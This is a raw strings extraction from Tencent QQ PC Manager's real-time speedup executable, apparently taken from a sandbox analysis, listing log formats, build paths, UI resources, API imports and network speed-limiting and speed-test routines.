Global\com.tencent.qqpcmgr.realtimespeedup.single.mutex
HWND : 0x%x Res:0x%x
OnTabPageCreate : %s
hXXp://guanjia.qq.com/help/3gll.html
hXXp://guanjia.qq.com/help/wsbh.html
hXXp://guanjia.qq.com/help/glwlll.html#glwlll_5
\QQPCRealTimeSpeedup.exe
platformxtml:QMNetMon.xml|QuitNetMon
platformxtml:QMNetMon.xml|NetworkMonPage
platformxtml:QMNetMon.xml|SettingWnd
@platformxtml:QMNetMon.xml|SettingNetMon
*.exe
platformxtml:popwnd.xml|EnableSpeedProtect
Fplatformxtml:popwnd.xml|Modify3GFlux
Fplatformxtml:popwnd.xml|MsgBoxStop3GFlux
F%uMB
hXXp://guanjia.qq.com/help/glwlll.html#glwlll_6
%dKB/S
platformxtml:QMNetMon.xml|NetFluxListItemStatus
platformxtml:QMNetMon.xml|NetFluxListItemUpDownLimit
platformxtml:QMNetMon.xml|NetFluxListItemUpDownSize
platformxtml:QMNetMon.xml|NetFluxListItemSecurity
platformxtml:QMNetMon.xml|NetFluxListItemProcessName
commonres:Icon\icon_warn(48x48).png
commonres:Icon\icon_info(48x48).png
platformxtml:popwnd.xml|SpeedProtectTips
<text config="RSNMBigGreenTextNode">%u</text>
<text config="RSNMBigGreenTextNode">%s</text>
platformxtml:QMNetMon.xml|NetSpeed_ListCtrl
platformxtml:QMNetMon.xml|NetSpeed_ListItem_Group
platformxtml:QMNetMon.xml|NetSpeed_ListItem
systheme:Common\Default.PNG
<text config="RSBlackTextNode">%d
</text><text config="RSBigGreenTextNode"> %dMB</text>
</text><text config="RSOrangeTextNode"> %dMB</text><text config="RSBlackTextNode">,
</text><text config="RSOrangeTextNode"> %dMB</text>
IDS_STRING_NETCOMM_TCP_STATE_LISTENING
IDS_STRING_NETCOMM_TCP_STATE_SYNSENT
IDS_STRING_NETCOMM_TCP_STATE_SYNRECEIVED
IDS_STRING_NETCOMM_TCP_STATE_ESTABLISHED
IDS_STRING_NETCOMM_TCP_STATE_CLOSING
IDS_STRING_NETCONN_REMOTEIPPORT
IDS_STRING_NETCONN_LOCALIPPORT
IDS_STRING_NETCONN_TCPUDP
E%s:%d
Danger : %s
commonres:Icon\icon_info(small).png
commonres:Icon\icon_danger(small).png
hXXp://ptlogin2.qq.com/doctor_error_net01_link
commonres:Icon\icon_color_info(16x16).png
commonres:Icon\icon_color_warn(16x16).png
rebootasked.mark
reboot.mark
WebApp
:<text config="RSGreenTextNode"> %d KB/S</text>
commonres:Icon\icon_normal(44x44).png
platformres:Protect\SPMAuto.png
platformres:Protect\SPMWebAppFirst.png
platformres:Protect\SPMGameFirst.png
platformres:Protect\SPMNoProt.png
InternetGetConnectedState: result %d, flag 0x%x
IsNetWorkAlive failed:0x%x
[%d] Speed=%I64d
[%d] Sum=%I64d Speed=%I64d %s
\StringFileInfo\%s\FileDescription
000%x
commonres:Common\exe32.ico
platformxtml:QMNetMon.xml|SpeedTestItem
ID_CTRL_ITEM%d
Old UnUsed Speed : Down = %d , Up = %d
Old Speed : Down = %d , Up = %d
Speed %d . D: %I64d U: %I64d CD: %I64d CU:%I64d
HGetTestStatus : %d
1620127iso_646.irv:19911351932windows-519320920001x-cp20001
1000932csshiftjis
1350221windows-502210712000cp12000
1028597iso_8859-70628605latin90501200utf160700154ptcp1541410010x-mac-romanian
1410001x-mac-japanese1200932cswindows31j
0601251cp12511201258windows-12580601125cp1125
1201257windows-12570601250cp12500601133cp1133
1201256windows-12561100932windows-31j
1000936csgb2312801201255windows-1255
1201254windows-1254
1052936hz-gb-23121201253windows-12531400949ks_c_5601_19871528599iso_8859-9:19890601201cp1201
0601200cp12001201252windows-1252
0810029x-mac-ce1201251windows-12511528598iso_8859-8:19880900949ks_c_56011110000csmacintosh
1201250windows-12501300932shifft_jis-ms
1528597csisolatingreek1100874windows-874
1100936windows-9360520127ascii
1100932windows-9321100437codepage437
0928596iso8859-60900154csptcp154
<>=\/?!"';
http-equiv
perfLogConf.ini
Global\{A4F31C01-A8C8-40ba-BC77-7E8BF6049F58}
Global\{388F581B-10BF-4918-8A80-565FDC0D6D2D}
Global\{2FF8DD38-1192-4fde-BCDA-C20DB962F403}
QMIpc.dll
MsgLoopWndClass.1234567890
Content-Type: multipart/form-data; boundary=%s
qqpcsysoptimize.exe
riched20.dll
riched20.dll.bk
@\RefuseInject.dll
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\Basic\HummerInclude\GFBase.cpp
qqpctray.exe
\StringFileInfo\xx\FileDescription
\StringFileInfo\xx\FileVersion
\StringFileInfo\xx\ProductName
d:\jenkins_trunk\workspace\11.5patch_sourcejob\qqpcmgr_proj\basic\hummerinclude\common\include\ComSinkPtr.h
d:\jenkins_trunk\workspace\11.5patch_sourcejob\qqpcmgr_proj\basic\hummerinclude\common\include\ITimer.h
Addr-0x%x
*.COMSINK-
.Begin
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\Basic\HummerInclude\Common/Include/UtilCore.h
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\Basic\HummerInclude\GF\Include\UtilMsgEvt.h
MessageSupporter
d:\jenkins_trunk\workspace\11.5patch_sourcejob\qqpcmgr_proj\basic\hummerinclude\gf\include\IGFElement.h
d:\jenkins_trunk\workspace\11.5patch_sourcejob\qqpcmgr_proj\basic\hummerinclude\GF/Include/IGFEvent.h
d:\jenkins_trunk\workspace\11.5patch_sourcejob\qqpcmgr_proj\basic\hummerinclude\gf\include\IGFMessage.h
CGFEventListener<class CGFEventListenerHelper<class CGFExeMain> >::OnGFEvent
CGFElementDestroyListener<class CGFEventListenerHelper<class CGFExeMain> >::OnGFElementDestroy
CGFMessageListener<class CGFMessageListenerHelper<class CGFExeMain> >::OnMessage
CGFMessageListener<class CGFMessageListenerHelper<class CGFExeMain> >::PreMessage
CGFElementDestroyListener<class CGFMessageListenerHelper<class CGFExeMain> >::OnGFElementDestroy
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\Basic\HummerInclude\GF\Include\UtilGF.h
*.ClosePopupWindows-EnumThreadWindowsProc
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\Basic\HummerInclude\CloseGFWindow.cpp
IMSEnumMFCThreadWindowsProc
*.ClosePopupWindows
IMSCloseMFCPopupWindows
IMSEnumThreadWindowsProcEx
IMSClosePopupWindowsEx
commonres:MessageBox\sysmessagebox_inforFile.png
kernel32.dll
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\Basic\HummerInclude\GF\Include\IGFElement.h
d:\jenkins_trunk\workspace\11.5patch_sourcejob\qqpcmgr_proj\basic\hummerinclude\GF/Include/IGFMessage.h
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\Basic\HummerInclude\initplatform.cpp
windows
msgbox_btn1
msgbox_btn2
msgbox_btn3
commonres:MessageBox\sysmessagebox_warningFile.png
commonres:MessageBox\sysmessagebox_questionFile.png
commonres:MessageBox\sysmessagebox_errorFile.png
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\Basic\HummerInclude\TXMessageBoxEx.cpp
d:\jenkins_trunk\workspace\11.5patch_sourcejob\qqpcmgr_proj\basic\hummerinclude\gf\include\IGFEvent.h
TrojanCloudAutoReport
{AF8F8383-6973-4318-B871-84F21699EA36}
{A2CFAE12-C34A-4c03-8CC4-AA96E454567A}
Read MiniBar Pos : %d,%d Ret:%d
Write MiniBar Pos : %d,%d Ret:%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
[%4ld] TAO %s : %s(%d) %s
CoLoadlibrary failed:%s
can not create factory:%d
\TAOFrame.exe
/TAOClient.dll
Ceate INetServiceClient Failed:result--%x, m_pNetServiceClient--%x
Query ITAOPath Interface From INetServiceClient Failed:0x%x
SetTAOPath for INetServiceClient Failed 0x%x
NetServiceClient Init Failed:%x
Register Netfow Infos Callback Failed:%x
IID_INetServiceClient2 : 0x%x
RegisterNetFlowInfoCallback2 OK : 0x%x
CNetFluxControl::EnumFluxInfoAndGetTotalData pid:%d, path:%s, down:%d, up:%d
CNetFluxControl::EnumFluxInfoAndGetTotalData pre total down %d, total up %d
CNetFluxControl::EnumFluxInfoAndGetTotalData ulRecvSpeed:%I64u, ulSendSpeed:%I64u, type:%d
CNetFluxControl::EnumFluxInfoAndGetTotalData after total down %d, total up %d
SetLimitRateIO : %s %d %d %d
SetLimitInfoByTAOControl.2 Update : %s %d.%d
%s . %d.%d.%d
GetLimitRate %s: %d %d %d
update.mark
GetModuleFileNameEx Returns Failed : 0x%x
GetProcessImageFileName Returns Failed : 0x%x
GetProcessImageFileName : %s
QueryDosPathToNormal : %c
QMGetProcessImgPath : %s
SetLimitInfoByTAOControl : %s S:%d R:%d Cut:%d
CNetFluxControl::OnNetFlowInfo2 %d. PID=%d D=%I64u U=%I64u Type=%d
CTAOControl::OnNetFlowInfo:%s, %I64u, %I64u
CNetFluxControl::OnNetFlowInfo %d. PID=%d D=%I64u U=%I64u Type=%d
m_pNetServiceClient Ping Failed with hr:0xX
Aexplorer.exe
services.exe
dwm.exe
csrss.exe
wininit.exe
winlogon.exe
lsass.exe
spoolsv.exe
svchost.exe
OUTLOOK.EXE
Foxmail.exe
YahooMessenger.exe
WangWang.exe
msmsgs.exe
Skype.exe
TXPlatform.exe
FetionFx.exe
tm.exe
rtx.exe
googletalk.exe
qq.exe
myie.exe
GreenBrowser.exe
Maxthon.exe
Safari.exe
TTraveler.exe
chrome.exe
opera.exe
firefox.exe
TheWorld.exe
iexplorer.exe
Kernel32.dll
CShellWindowsMgr
CFileQueryMgrImp.Window
Uninit : 0x%x
Query File : %s Cache Result : %d
Async Query File : %s
eWait Finish Scan : %s
QueryFileIO : %s
Path Is Not Exist : %s
LocalFileQuery : Result:%d SecLevel:%d %s
QMIsFileSigned : Result:%d %s
TAV Start Scan OK : enumQS_QUERYING : %s
OnOneFileQueryComplete : SecLevel : %d , Error : %d %s
RegisterClassEx Error : %d
Create Window : 0x%x
Destroy : 0x%x This:0x%p
CSpeedProtControl::Refresh: limit progress:%s--downLimit:%d--upLimit:%d--bCut:%d
mCMobileFluxControl::DetectMobileConnections: %s is mobile connect!
CMobileFluxControl::DetectMobileConnections: %s is not mobile connect!
CMobileFluxControl::DetectMobileConnections: RasEnumConnections failed:0x%x
BNMLib.dat
NetflowCfg.dat
Global\{7B2D79BE-F993-49c5-B8B8-EB05FA872DCC}
CNetflowConfig::Is3GNetAdapter: %s is not in the 3g adapter list
SetMinibarPos : %d,%d Ret=0x%x
Get MiniBar Pos : %d,%d Ret=0x%x
hXXp://dl_dir.qq.com/invc/qqdoctor/other/test32mb.dat
0.0.0.0
%u-%s:%d-%s:%d-%d-%d
Hnetsp.master.qq.com
dlied6.qq.com
/invc/qqdoctor/other/test32mb.dat
[%d]Start Updata
Thread ID : %d , index : %d
Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
[%d]InternetOpen : 0x%x 0x%x
[%d]InternetSetOption : 0x%x 0x%x
[%d]InternetConnect : 0x%x 0x%x
[%d]HttpOpenRequest : 0x%x 0x%x
[%d]HttpQueryInfo : 0x%x 0x%x
[NETTEST] Status Code:%d
[%d] Finished: up Speed:%d Kb
[%d] _SendReqData : dwPostSize %d
[%d] AddRequestHeaders : %d 0x%x
Error on HttpSendRequestEx 0x%x
[NETTEST] Error on InternetWriteFile sSendHeadData 0x%x
[%d] InternetWriteFile Written:%d Ret:%d 0x%x %d
xStart Down Data : TID=%d
[NETTEST]TID=%d DownSpeed:d = d Percent
[NETTEST] InternetReadFile failed: %d=Tid:%d
Finished:Down:Tid:%d
[NETTEST] Finished: TID=%d Down Speed:%d Kb
[NETTEST] CheckNetworkAlive1: Fail:%d
[NETTEST] CheckNetworkAlive2: Fail:%d
[NETTEST] CheckNetworkAlive3: Fail:%d
[NETTEST] CheckNetworkAlive4: Fail:%d
[NETTEST] GetTestStatus: hr:0x%x,hr1:0x%x
%d ms
%d ms
CNetSpeedAnalysis::GetNetSpeed:elapseUp:%d, elapseDown:%d
{E5BC20DF-2992-4cc5-A292-4988E250AFDD}
QQDRFSR.DAT
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
wTAVEng.dll
advise thread:%d, cookie:%d
hunadvise thread:%d, cookie:%d
RunScan : 0x%x
pExit : 0x%x
Wait OK : 0x%x
InitTavEngineWrap : 0x%x
ScanFileEx : %s
Exit Thread : 0x%x
ScanFile : %s
RegKey
LinkExeName
CSpeedLimitAlgorithm::CheckAndAdjustTotalMark download 1: oriDownMark:%d
CSpeedLimitAlgorithm::CheckAndAdjustTotalMark download 2: oriDownMark:%d
CSpeedLimitAlgorithm::CheckAndAdjustTotalMark download 3: oriDownMark:%d
CSpeedLimitAlgorithm::CheckAndAdjustTotalMark downlaod 4: oriDownMark:%d
CSpeedLimitAlgorithm::CheckAndAdjustTotalMark download adjust:%d
CSpeedLimitAlgorithm::CheckAndAdjustTotalMark download adjust maxProtectRegion:%d--maxLimitRegion:%d--maxTotalDownload:%d--totalDownloadMark:%d
CSpeedLimitAlgorithm::CheckAndAdjustRegionMark: bForceAdjust:%d
CSpeedLimitAlgorithm::CheckAndAdjustRegionMark bAdjust:%d
CSpeedLimitAlgorithm::CheckAndAdjustRegionMark: realDownProtect:%d--realUpProtect:%d
CSpeedLimitAlgorithm::CheckAndAdjustRegionMark: downProtectRate:%d--upProtectRate:%d
CSpeedLimitAlgorithm::CheckAndAdjustRegionMark: downProtectMark:%d--upProtectMark:%d
CSpeedLimitAlgorithm::CheckAndAdjustRegionMark: downLimitMark:%d--upLimitMark:%d
CSpeedLimitAlgorithm::CheckAndAdjustRegionMark: downTotalMark:%d--upTotalMark:%d
CSpeedLimitAlgorithm::LimitRegionInternalAdjustion_Download: exceed flux:%d
CSpeedLimitAlgorithm::Lessen downLimit: %s--%d
CSpeedLimitAlgorithm::LimitRegionInternalAdjustion_Download_LessRemain: downLimit:%d, downAverage:%d
CSpeedLimitAlgorithm::Enlarge downLimit 1: %s--%d
CSpeedLimitAlgorithm::Enlarge downLimit 2: %s--%d
CSpeedLimitAlgorithm::LimitRegionInternalAdjustion_Upload: exceed flux:%d
CSpeedProtControl:Lessen upLimit:%s--%d
CSpeedLimitAlgorithm::Enlarge upLimit 1: %s--%d
CSpeedLimitAlgorithm::Enlarge upLimit 2: %s--%d
Hiphlpapi.dll
TCP PID : %d - [%d] %s
pUDP PID : %d - %s
Set Message Loop : ID=0x%p MsgLoop=0x%p
{EB0D612F-45F1-4ab6-88F6-6A3C51AFBD48}_WM_APC
Pipe Broken
DQMWebFW.DLL
\\.\pipe\qm_ipc_channel
PipeClient connect error
CIpcClient::Stop -- Not ALL IPC Msg UnRegistered
SendLoopbackMessage FAILED, MSGID:{0}, Reason: Service disabled
PostLoopbackMessage FAILED, MSGID:{0}, Reason: Service disabled
PostLoopbackMessage FAILED, MSGID:{0}
/{0}/{1}/{2}
SendIpcMessage Begin, MSGID:{0}, TARGET:{1}
SendIpcMessage FAILED, MSGID:{0}, TARGET:{1}, Reason: Service disabled
PostIpcMessage FAILED, MSGID:{0}, TARGET:{1}, Reason: Service disabled
ForwardMessage - Forward Message, MsgId:{0}, FROM:/{1}/{2}/{3} TO {4}
ForwardMessage - Forward Message Failed, MsgId:{0}, FROM:/{1}/{2}/{3} TO {4}
/%d/%d/%d
DCreateNamedPipe
PipeServer::Run() - ConnectNamedPipe:
PipeServer::CreateListeningPipe Start Listen
PipeServer::Run() - GetOverlappedResult:
PipeServer::Run() - WaitForMultipleObjects:
PipeServer::Run() - Exception:
PipeServer::Run() - Unexpected exception
PipeServer::ReleaseTunnel()
PipeServer::WorkerThread::WriteCompleted - Tunnel write where not all data was written
PipeServer::Tunnel::Tunnel()
PipeServer::WorkerThread::Run() - Exception:
PipeServer::WorkerThread::Run() - Unexpected exception
PipeServer::WorkerThread::Run() - Unexpected operation
PipeServer::WorkerThread::Run() - Unexpected - pBuffer is 0
D0 is an invalid value for completionKey
CIOCompletionPort::CIOCompletionPort() - CreateIoCompletionPort
CIOCompletionPort::AssociateDevice() - CreateIoCompletionPort
CIOCompletionPort::PostStatus() - PostQueuedCompletionStatus
CIOCompletionPort::GetStatus() - GetQueuedCompletionStatus
rGlobal\{17ED6DA0-0902-461c-B763-F00FF209066B}
Global\{FA6FBBB1-8C8E-43b1-B8EC-35573A94C231}
ErrLogFile.log
C:\ErrLogFile.log
QQQuickLoginInfo
QQLoginInfo
ntdll.dll
Failed to call RtlGetVersion(), err=%d, RtlGetVersion=%p
Windows version: %d.%d.%d (sp %d)
dr.dll
%u.%u.%u.%u
11.5.17490.219
ED823ABCA-A92F-429d-9E11-3779B5F682AA
QMCommon.dll
Load QMCommon.dll failed, path=%S
QQPCMgr.exe
QQPCTray.exe
QQPCRTP.exe
Global\{C8CA5A2E-89F9-49e2-AA24-7868C090DDA4}
QMConfig.dat
11,5,17490,219

QQPCRealTimeSpeedup.exe_4488:




.text
`.rdata
@.data
.rsrc
@.reloc
Ÿ,t
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftsys\QMExe\QQPCRealTimeSpeedup\commonlogic\MemFilter\MemFilter.cpp
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftsys\QMExe\QQPCRealTimeSpeedup\APP\nativehandler.cpp
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftsys\QMExe\QQPCRealTimeSpeedup\UI\NetworkSpeedTestFrame.cpp
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftsys\QMExe\QQPCRealTimeSpeedup\APP\QQPCRealTimeSpeedupApp.cpp
Log.cfg
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftsys\QMExe\QQPCRealTimeSpeedup\commonlogic\SpeedupNetflow.cpp
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftsys\QMExe\QQPCRealTimeSpeedup\APP\SpeedupPluginManager.cpp
Have Arrive Next Day, Pre Data: %d-%d-%d, Now Data:%d-%d-%d
receive appevent:%d
showNetMonWnd from toolsbox, report
startSpeedTest from toolsbox, report
TIMER_ID_REPORT_ROCKET_LAUNCH uSecondToNextDay = %d
TIMER_ID_REPORT_ROCKET_10_MIMUTES uSecondToNextDay = %d
TIMER_ID_REPORT_ROCKET_30_SECONDS uSecondToNextDay = %d
AsyncBroadCastEvent:%d
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftsys\QMExe\QQPCRealTimeSpeedup\commonlogic\SubFuncItemGameMgr.cpp
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftsys\QMExe\QQPCRealTimeSpeedup\commonlogic\SubFuncItemMemory.cpp
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\Basic\Include\FTsys/CubeSwitch.h
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftsys\QMExe\QQPCRealTimeSpeedup\commonlogic\SubFuncItemProcess.cpp
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftsys\QMExe\QQPCRealTimeSpeedup\commonlogic\SubFuncItemWinKeyForbidden.cpp
UnForbiddenWinKey
ForbiddenWinKey
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftsys\QMExe\QQPCRealTimeSpeedup\commonlogic\SubItemStartup.cpp
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftsys\QMExe\QQPCRealTimeSpeedup\commonlogic\SubItemWndScreenMgr.cpp
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftsys\QMExe\QQPCRealTimeSpeedup\commonlogic\MemFilter\WhiteListParser.cpp
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftsys\QMExe\QQPCRealTimeSpeedup\UI\NetworkFluxListItem.cpp
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftsys\QMExe\QQPCRealTimeSpeedup\UI\NetworkMonPage.cpp
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftsys\QMExe\QQPCRealTimeSpeedup\commonlogic\CheckFullScreen.cpp
KeyValue
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftsys\QMExe\QQPCRealTimeSpeedup\commonlogic\ClientNetworkInfoQuery.cpp
Content-Disposition: form-data; name="%s"
Content-Disposition: form-data; name="%s"; filename="%s"
--%s--
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftsys\QMExe\QQPCRealTimeSpeedup\commonlogic\NetSpeedTester.cpp
X:X:X:X:X:X
uptest.dat
[%d] HttpEndRequest Ok 0x%x
[%d] Error on HttpEndRequest Error 0x%x
[%d] Error on InternetWriteFile sSendHeadData Size=%d , 0x%x
Init start value %d
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTCommon\QMCommonLibDll\QMPerfMon\QMPerfMon.cpp
InitPerfMon [ok]: module:%s
InitPerfMon [error]: module:%s
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftsys\QMLogicLib\GameProcessFilter\GameProcessFilter.cpp
QQLogin
(%d.%d) d:d:d.d %s_%s:d(K): %s
(%d) d:d:d.d %s_%s: %s
(M) d:d:d.d ||
CreateIReportClient
ReleaseIReportClient
masterconn11.qq.com
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTCommon\QMCommonLibDll\QMReportMgr\QMReportMgr.cpp
InitCommonData, ProductID=%d, ClientVersion=%I64d
QMEnumLoginQQ
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTCommon\QMCommonLibDll\QMCommonlib\QMCommon.cpp
Get function "%s" address failed.
QMGetIconFromCmdLine
QMLocateFileByCmdLine
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\Basic\Output\BinFinal\QQPCRealTimeSpeedup.pdb
IMM32.dll
RPCRT4.dll
HttpQueryInfoW
HttpSendRequestW
HttpOpenRequestW
HttpAddRequestHeadersW
HttpEndRequestW
HttpSendRequestExW
WININET.dll
WS2_32.dll
Common.dll
GF.dll
KERNEL32.dll
MsgWaitForMultipleObjects
EnumWindows
USER32.dll
RegCloseKey
RegOpenKeyExW
RegNotifyChangeKeyValue
RegCreateKeyExW
RegGetKeySecurity
RegSetKeySecurity
RegQueryInfoKeyW
RegDeleteKeyW
RegFlushKey
RegEnumKeyExW
ADVAPI32.dll
ShellExecuteExW
SHELL32.dll
ole32.dll
OLEAUT32.dll
ATL80.DLL
SHLWAPI.dll
MSVCP80.dll
COMCTL32.dll
PSAPI.DLL
MSVCR80.dll
_amsg_exit
_wcmdln
_crt_debugger_hook
sfc.dll
VERSION.dll
?DelIdleCallback@Window@Util@@YAJPAVVTXMsgLoopIdleCallback@@@Z
?SetBugReportUin@TXBugReport@@YAXKPB_W@Z
?ValidateBugReport@TXBugReport@@YAXXZ
?InitBugReport@TXBugReport@@YAXPB_W000GGKHHKKP6GHPAUtagBugReportInfo@1@PBD200PAPAXPAKPAX@Z@Z
GetProcessHeap
QQPCRealTimeSpeedup.exe
.?AVCSubFuncItemWinKeyForbidden@@
.?AV?$CKeyValue@G@svrlib@@
.?AVCQMIpcPipe@IPC@@
.?AV?$CSingleton@VCReportManager@QMReportMgr@@@utils@@
.?AVCReportManager@QMReportMgr@@
.?AVTSMsg@@
.?AVITSMsg@@
.?AVTSMsgMap@@
.?AVITSMsgMap@@
.?AVTSMsgDispatcher@@
.?AVITSMsgDispatcher@@
.?AVTSMsgStub@@
.?AVITSMsgStub@@
.?AVVTXMsgLoopIdleCallback@@
.?AVCGFExeApp@@
<assemblyIdentity type="win32" name="Microsoft.VC80.CRT" version="8.0.50727.4053" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>
<assemblyIdentity type="win32" name="Microsoft.VC80.ATL" version="8.0.50727.4053" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
2%2s2
5Y5X5b5
<0=9=`=|=
<2<7<=<[<
2 282?2`2
<%<2<?<^<
2/343:3]3
5"5(5.545:5_5
2,2Z2k2w2
6 6$6(6,6064686
4 4$4(4,4044484<4@4
= =$=(=,=0=4=
? ?$?(?,?0?
0 0$0(0,0
; ;$;(;,;0;4;8;<;@;
< <$<(<,<0<4<8<<<
$;(;,;0;4;8;
< <(<0<<<`<
6,686@6`6
:$:,:8:`:
pprotect filter %s
@enter 64 judge 2 %s, %s
SpeedUpExe-[ShowDeepSpeedupWnd]
SpeedUpExe-[ShowNetworkOptimizeWnd]
SpeedUpExe-[ShowSystemOptimizeWnd]
SpeedUpExe-[showNetMonWnd:ToolsBox]
SpeedUpExe-[startSpeedTest:ToolsBox]
SpeedUpExe-[showNetMonWnd]
SpeedUpExe-[startSpeedTest]
ERocketMsgWnd{D30919B8-61BA-48ec-8DBC-ADB46B83E37C}
user32.dll
send cmd msg:%s
cmd msg:%s
_IsFirstInstance: HandleCmdLineOldToSelf! cmdLine = %s
_IsNotFirstInstance: HandleAppEventCmdLine! cmdLine = %s
CommandLineToArgv failed!cmdLine=%s
explorer.exe
services.exe
dwm.exe
csrss.exe
wininit.exe
winlogon.exe
lsass.exe
spoolsv.exe
svchost.exe
OUTLOOK.EXE
Foxmail.exe
YahooMessenger.exe
WangWang.exe
msmsgs.exe
Skype.exe
TXPlatform.exe
FetionFx.exe
tm.exe
rtx.exe
googletalk.exe
qq.exe
myie.exe
GreenBrowser.exe
Maxthon.exe
Safari.exe
TTraveler.exe
chrome.exe
opera.exe
firefox.exe
TheWorld.exe
iexplorer.exe
d:\jenkins_trunk\workspace\11.5patch_sourcejob\qqpcmgr_proj\basic\hummerinclude\gf\include\IGFElement.h
platformxtml:SpeedupNetMon.xml|FluxSpeedItem
Start Connect Thread Is = %d
Start Check Thread Is = %d
systheme:nettest\netdial_pointercircle.png
systheme:nettest\netdial.png
systheme:nettest\netdial_pointercircle_err.png
systheme:nettest\netdial_err.png
m_UIState = %d
Test Connect Result Is = %d
Bsystheme:nettest\netdial_pointer.png
t"%s\QQPCMgr.exe" /IntoMode=%d /TAB_SYSCLEAN /WEB_AUTOSTART1
d:\jenkins_trunk\workspace\11.5patch_sourcejob\qqpcmgr_proj\basic\hummerinclude\gf\include\IGFMessage.h
systheme:nettest\netdialmini_pointer.png
\RefuseInject.dll
Fail to LaunchProcessAsAdministrator! errorCode=%d
Fail to RunAsCurrentPermission! commandline = %s
Succeed to RunAsCurrentPermission! commandline = %s
m_hMutex=%d, lasterror=%d
WaitForSingleObject(mutex) return 0xx
Global\990A13B4-9DF2-45a8-ABE5-1DE1A9044A9D
MSGID_QQROCKET_QUERYOPTIMIZEITEM recv..
MSGID_QQROCKET_OPTIMIZEITEM recv..
MSGID_QQROCKET_NOTIFY recv..
MSGID_QQROCKET_NOTIFY_ENTERCHATSTATE recv..
MSGID_QQROCKET_NOTIFY_SETCURPLR recv..
BGlobal\com.tencent.qqpcmgr.realtimespeedup.single.mutex
\SpeedupPlugins.etf
Add Icon File System Fail, hResult=0xx, path=%s!
Add Icon File System from appdata dir Fail, hResult=0xx, path=%s!
QQPCRealTimeSpeedup.tpc
RealTimeSpeedup: More than one exe instance!
RealTimeSpeedup: Command Line Wrong!%s
BSpeedupCfg.dat
B\RTXLite.exe
\Tencent\RTXLite\Application\RTXLite.exe
defSpeedupToolbarHotKeyFire
E[%4ld] TAO %s : %s(%d) %s
\SpeedupNetflowLimit.etf
can not create factory:%d
CoLoadlibrary failed:%s
failed to initialize netflow SP adapter hr[0x%x]
Query ITAOPath Interface From IPrefetchServiceClient Failed:0x%x
SetTAOPath for IPrefetchServiceClient Failed 0x%x
\TAOFrame.exe
TAOClient.dll
block process [%s] dwRecvRatePerSecond[%lu] dwSendRatePerSecond[%lu] bCutof[%ld]
limitex process [%s] dwRecvRatePerSecond[%lu] dwSendRatePerSecond[%lu] bCutof[%ld]
unlimit process[%s] down[0] up[0]
limit process [%s] mode[%d] down[%u] up[%u]
SpeedUpExe
InitPluginSkin ok %d
Game exe stop pid:%d
DGame exe start pid:%d, name:%s
CSubFuncItemGameMgr::OnProcessStart: %d
Realloc %u bytes failed.
NtQuerySystemInformation failed with ntstatus 0xX.
Get NtQuerySystemInformation failed with error code 0xX.
Del ID %d PID %d
e\MemDefrag.dll
CCBackSrvCubeSwitch::GetOneSwitch switch at %d is %s
CBackSrvCubeSwitch::GetOneSwitch failed curIdx:%d, bufferSize:%d
Write defSpeedupReportProcGUIDDay Fail
Write defSpeedupReportProcGUIDDay Succ
defSpeedupReportProcGUIDDay
defSpeedupReportProcDay
defSpeedupReportProcForEveryDay
print type:%s, app:%s, key:%s, value:%d
print, app size:%d
Read defSpeedupReportProcGUIDDay Fail
Read defSpeedupReportProcGUIDDay Succ Ret = %d
Dtype:%s get key name failed
type:%s get app name failed
FtSysIconFs:SoftIcon_16\%ld_16.png
FtSysIconFs:SoftIcon\%ld.png
speeduprocketres:sys_svc_log.png
Close Proc %s
